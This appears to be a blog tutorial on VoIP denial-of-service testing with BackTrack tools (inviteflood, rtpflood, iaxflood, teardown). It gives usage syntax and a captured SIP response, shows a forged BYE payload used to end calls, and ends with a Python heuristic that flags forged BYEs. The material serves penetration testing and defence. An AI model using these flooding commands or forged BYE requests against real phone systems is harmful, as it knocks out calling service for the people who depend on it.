A denial of service attack on VoIP services can render them useless by intentionally damaging the availability of the network and the VoIP systems. This attack can occur on two levels: standard network DoS attacks and VoIP-specific DoS attacks. Generally this means flooding the network with data to consume all its resources, or overwhelming a specific protocol with requests. Let's take a quick overview of the tools available in Backtrack.
Inviteflood
This tool can be used to flood a target with INVITE requests. It can be used to target SIP gateways/proxies and SIP phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
interface (e.g. eth0)
target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
target domain (e.g. enterprise.com or an IPv4 address)
IPv4 addr of flood target (ddd.ddd.ddd.ddd)
flood stage (i.e. number of packets)
Optional -
-a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface]
-S srcPort (0 - 65535) [default is well-known discard port 9]
-D destPort (0 - 65535) [default is well-known SIP port 5060]
-l lineString line used by SNOM [default is blank]
-s sleep time btwn INVITE msgs (usec)
-h help - print this usage
-v verbose output mode
A basic usage syntax looks like this:
./inviteflood eth0 target_extension target_domain target_ip number_of_packets
As long as the tool keeps flooding the SIP gateway, it will prevent users from making phone calls. You can flood the SIP proxy with a nonexistent extension, making it generate a 404 Not Found just to keep it busy.
Rtpflood
Rtpflood is used to flood a target IP phone with UDP packets containing RTP data. To launch a successful attack using rtpflood you need to know the RTP listening port on the remote device you want to attack; for example, the X-Lite softphone's default RTP port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID
Iaxflood
IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets
Teardown
Teardown is used to terminate a call by sending a BYE request.
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag
First you will need to capture a valid SIP OK response and use its From and To tags and a valid Call-ID value.
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0
If you specify the “-v” option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>
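The payload above carries several values a monitor can check before a BYE is honoured. The following is an added example, not code from the original post or from the teardown tool: it compares a BYE against known dialog state and flags the CSeq jump and the discard-port Via seen in that payload. The function names, the MAX_CSEQ_JUMP threshold and the dialog table are assumptions made for illustration.

```python
import re

MAX_CSEQ_JUMP = 1000  # assumed threshold; tune for your deployment

def parse(msg):
    """Split a raw SIP message into its start line and a lower-cased header dict."""
    lines = msg.strip().splitlines()
    hdrs = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    return lines[0], hdrs

def suspicious_bye(src_ip, msg, dialogs):
    """Return the reasons a BYE looks forged; an empty list means it looks normal."""
    start, h = parse(msg)
    if not start.startswith("BYE "):
        return []
    dlg = dialogs.get(h.get("call-id"))
    if dlg is None:
        return ["unknown Call-ID"]
    reasons = []
    if src_ip not in dlg["peers"]:
        reasons.append("source is not a dialog peer")
    cseq = re.match(r"(\d+)", h.get("cseq", ""))
    if cseq and int(cseq.group(1)) - dlg["last_cseq"] > MAX_CSEQ_JUMP:
        reasons.append("CSeq jump")
    via = re.search(r"SIP/2\.0/UDP\s+[^;:\s]+:(\d+)", h.get("via", ""))
    if via and via.group(1) == "9":
        reasons.append("Via port is discard port 9")
    return reasons

# Constructed dialog state, as a monitor would build it from observed signalling.
DIALOGS = {"jwtgckolqnoylqf@backtrack":
           {"peers": {"192.168.1.104", "192.168.1.105"}, "last_cseq": 134}}

# The BYE payload from the page, trimmed to the headers the checks read.
FORGED = """BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE"""

# Constructed in-dialog BYE for comparison.
NORMAL = """BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:5060;branch=z9hG4bKconstructed
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 135 BYE"""
```

These checks are heuristics: a BYE that passes them can still be forged, so authenticating in-dialog requests remains the actual mitigation.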
Source: http://hoznimonzter.blogspot.com